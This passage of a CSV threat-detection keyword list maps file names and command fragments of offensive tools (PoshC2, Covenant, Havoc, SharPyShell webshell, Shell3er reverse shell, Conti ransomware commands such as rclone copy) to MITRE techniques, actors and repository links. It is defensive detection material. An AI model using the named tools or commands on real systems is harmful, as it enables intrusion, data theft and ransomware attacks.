TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*sharpweb all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 
- T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpWebManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpWebServer.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWifiGrabber.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpwmi action=*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpWMI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWMI.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpWmiManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*sharpwmi-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*sharpwsus 
locate*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*SharpWSUS*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*SharpWSUS.*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" +"*SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.","T1505 - T1027 - T1059 - T1117","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*sharpyshell.aspx*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web 
Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*SharPyShell.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*SharpZeroLogon*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SharpZeroLogon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpZippo.exe*","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","55","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" +"*ShawnDEvans/smbmap*","offensive_tool_keyword","exegol","Fully featured and community-driven 
hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ShawnDEvans/smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*shell 'cmd.exe /c*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shell net group *Domain Computers* /domain*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell net localgroup administrators*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell nltest /dclist*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell rclone.exe copy *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell should now be running as nt authority\\system!*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*shell whoami /user*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised 
Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*shell whoami*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*shell.exe -s payload.txt*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*shell_shocked*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*shell_shocked*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*shell_startup_files_modification.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*Shell3er.ps1*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*shellc *.bin *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*shellc *.shellc *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*ShellCmd cmd.exe *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd copy *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd net *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd sc qc 
*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*SHELLCODE GENERATOR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*shellcode inject *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Shellcode Injected Successfully*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*shellcode spawn *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*shellcode*shellcode.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*shellcode.asm*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" +"*Shellcode.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*shellcode_dll.dll*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*shellcode_dll\*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - 
T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A",,"N/A",,, +"*shellcode_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*shellcode_dropper.c*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*shellcode_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Shellcode_encryption.exe*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 